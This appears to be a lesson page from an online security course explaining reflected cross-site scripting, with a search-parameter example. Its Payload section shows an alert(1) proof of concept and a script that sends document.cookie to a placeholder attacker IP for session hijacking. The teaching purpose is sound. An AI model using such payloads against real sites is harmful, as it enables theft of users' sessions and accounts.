Dashboard
Courses
Logout

NAME

Course Overview

/

Reflective XSS

Reflective Cross-Site Scripting

Cross-Site Scripting is a client-side attack where an attacker attempts to inject malicious JavaScript into a web application so that it is executed in a user’s browser.  A key goal of Cross-Site Scripting is to trigger a user’s browser to run a command that will make a request to a server controlled by an attacker.  This may be used to retrieve session tokens and achieve session hi-jacking or trigger a drive-by download.

Reflected Cross-Site Scripting occurs when a user is able to provide data in an HTTP request that is reflected back in HTTP responses.  It is most common in HTTP GET requests, however that does not mean that POST requests should be ignored.  An example of this may be a search box, where applications may produce a page with a title of “Search Results for: <user data>

Any data a user provides to an application that is reflected back can be used as a potential attack vector for Reflected Cross-Site Scripting.  Nearly all Cross-Site Scripting opportunities are created by applications allowing user input to directly dictate what HTML tags will be used in the response.

Payload

If an attacker identifies a parameter that is reflected to the browser they may try to trigger a Cross-Site Scripting payload as shown below:

www.northgreensecurity-insecuresite.com/search?s=xss

A web application that renders:

“Results for xss” would be worth investigating.

A malicious PoC typically aims to trigger an alert box by using a payload such as <script>alert(1)</script>

www.northgreensecurity-insecuresite.com/search?s=<script>alert(1)</script>

Should a potential victim follow this link, their browser would navigate to the northgreensecurity-insecuresite and a pop up box would appear with the text 1 in it.  While a popup box is not malicious, it is a good visual PoC.  A more malicious attack may attempt to steal a user’s session cookie, this would allow an attack to impersonate the user and gain access to their account.  This could be achieved with a payload such as:

<script>document.write(<img src=“<Attackers IP>?c=‘+document.cookie+ ‘” />’);</script>